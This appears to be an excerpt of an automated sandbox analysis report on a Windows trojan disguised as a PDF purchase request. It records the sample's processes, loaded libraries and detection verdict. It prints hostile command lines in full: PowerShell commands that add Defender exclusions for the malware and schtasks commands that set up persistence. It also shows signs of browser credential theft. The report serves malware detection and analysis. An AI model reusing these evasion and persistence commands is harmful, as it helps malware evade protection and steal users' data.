                Source: NEW.RFQ00876.pdf.exe, 00000000.00000002.1304672176.0000000003395000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.dllT vs NEW.RFQ00876.pdf.exe
                Source: NEW.RFQ00876.pdf.exe, 00000000.00000002.1304672176.0000000003395000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Drawing.dllT vs NEW.RFQ00876.pdf.exe
                Source: NEW.RFQ00876.pdf.exe, 00000000.00000002.1304672176.0000000003395000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Configuration.dllT vs NEW.RFQ00876.pdf.exe
                Source: NEW.RFQ00876.pdf.exe, 00000000.00000002.1304672176.0000000003395000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Core.dllT vs NEW.RFQ00876.pdf.exe
                Source: NEW.RFQ00876.pdf.exe, 00000000.00000002.1304672176.0000000003395000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Xml.dllT vs NEW.RFQ00876.pdf.exe
                Source: NEW.RFQ00876.pdf.exe, 00000000.00000002.1304672176.0000000003395000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs NEW.RFQ00876.pdf.exe
                Source: NEW.RFQ00876.pdf.exe, 00000000.00000002.1304672176.0000000003395000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.VisualBasic.DLLT vs NEW.RFQ00876.pdf.exe
                Source: NEW.RFQ00876.pdf.exe, 0000000F.00000002.1464991439.000000000194D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs NEW.RFQ00876.pdf.exe
                Source: NEW.RFQ00876.pdf.exeBinary or memory string: OriginalFilenameaRrJg.exe. vs NEW.RFQ00876.pdf.exe
                Source: NEW.RFQ00876.pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: NEW.RFQ00876.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: RAangyFeHdZLco.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.NEW.RFQ00876.pdf.exe.7560000.7.raw.unpack, Ailu8G9t2evw62NJXl.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.NEW.RFQ00876.pdf.exe.7560000.7.raw.unpack, Ailu8G9t2evw62NJXl.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.NEW.RFQ00876.pdf.exe.7560000.7.raw.unpack, Ailu8G9t2evw62NJXl.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.NEW.RFQ00876.pdf.exe.44465d0.5.raw.unpack, Ailu8G9t2evw62NJXl.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.NEW.RFQ00876.pdf.exe.44465d0.5.raw.unpack, Ailu8G9t2evw62NJXl.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.NEW.RFQ00876.pdf.exe.44465d0.5.raw.unpack, Ailu8G9t2evw62NJXl.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.NEW.RFQ00876.pdf.exe.7560000.7.raw.unpack, H87Xg77JWFJPkXQfOh.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.NEW.RFQ00876.pdf.exe.44465d0.5.raw.unpack, H87Xg77JWFJPkXQfOh.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@23/16@18/13
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeFile created: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7356:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5260:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7984:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6212:120:WilError_03
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeFile created: C:\Users\user\AppData\Local\Temp\tmpEC94.tmpJump to behavior
                Source: NEW.RFQ00876.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: NEW.RFQ00876.pdf.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: msinfo32.exe, 0000001A.00000002.3718631099.0000000002F0A000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 0000001A.00000003.1658127262.0000000002EFE000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 0000001A.00000002.3718631099.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 0000001A.00000003.1657993301.0000000002EDD000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 0000001A.00000002.3718631099.0000000002EFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: NEW.RFQ00876.pdf.exeReversingLabs: Detection: 50%
                Source: NEW.RFQ00876.pdf.exeVirustotal: Detection: 49%
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeFile read: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe"
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RAangyFeHdZLco" /XML "C:\Users\user\AppData\Local\Temp\tmpEC94.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess created: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RAangyFeHdZLco" /XML "C:\Users\user\AppData\Local\Temp\tmp78E.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeProcess created: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe "C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe"
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeProcess created: C:\Windows\SysWOW64\msinfo32.exe "C:\Windows\SysWOW64\msinfo32.exe"
                Source: C:\Windows\SysWOW64\msinfo32.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe"Jump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe"Jump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RAangyFeHdZLco" /XML "C:\Users\user\AppData\Local\Temp\tmpEC94.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeProcess created: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RAangyFeHdZLco" /XML "C:\Users\user\AppData\Local\Temp\tmp78E.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeProcess created: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe "C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe"Jump to behavior
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeProcess created: C:\Windows\SysWOW64\msinfo32.exe "C:\Windows\SysWOW64\msinfo32.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeSection loaded: windows.staterepositoryps.dllJump to behavior
